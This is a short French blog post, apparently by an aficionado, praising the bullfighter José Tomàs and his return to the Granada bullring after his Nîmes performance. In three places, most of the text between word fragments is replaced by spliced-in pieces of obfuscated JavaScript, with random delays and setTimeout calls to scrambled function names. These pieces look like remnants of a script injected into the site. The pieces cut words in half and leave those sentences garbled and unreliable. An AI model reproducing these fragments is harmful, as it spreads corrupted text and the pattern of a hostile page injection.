JOSE TOMAS

José Tomàs ne parle pas, n’écrit pas. Par contre, beaucoup parlent de lui ou écrivent sur lui. Son retour à Grenade, 639 jours après son solo de Nîmes, a été mille et mille fois commenté. Certains ont longuement évoqué son accrochage sans conséquence, disent-ils d’une faute de débutant. Combien de fois voit-on dans une saison taurine, les toreros tourner le dos au toro et aller chercher l’épée ?

A Grenade, le toro lourd et puissant (578 kgs), agé de 5 ans, qui n’a jamais humilié, a jailli, l’a accroché… Vous connaissez la suite.

D’autres osent même écrire qu’il met ses accrochages en scène. D’autres encore lui demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andent de faire une saison complète.

Lui reste imperturbable et se tait. Il torée où il veut, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and il veut. Libre aux aficionados d'aller ou de ne pas aller le voir toréer.

A Grenade, José Tomàs a rempli les arènes et pas seulement le jour de sa corrida.

A Grenade, José Tomàs a distillé cet impression étrange et indéfinissable qui l'accompagne à chacune de ses corridas.

José Tomàs m'a bouleversé à Madrid le 5 juin 2008, m'a ébloui à Nîmes le 16 septembre 2012.

A Grenade, j'ai retrouvé le même José Tomàs, ses petits pas, l'abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andon de son corps, l'économie des gestes.

Un personnage hors norme et hors du temps.

Unique et fascinant !

tomasNetB

Les commentaires sont fermés.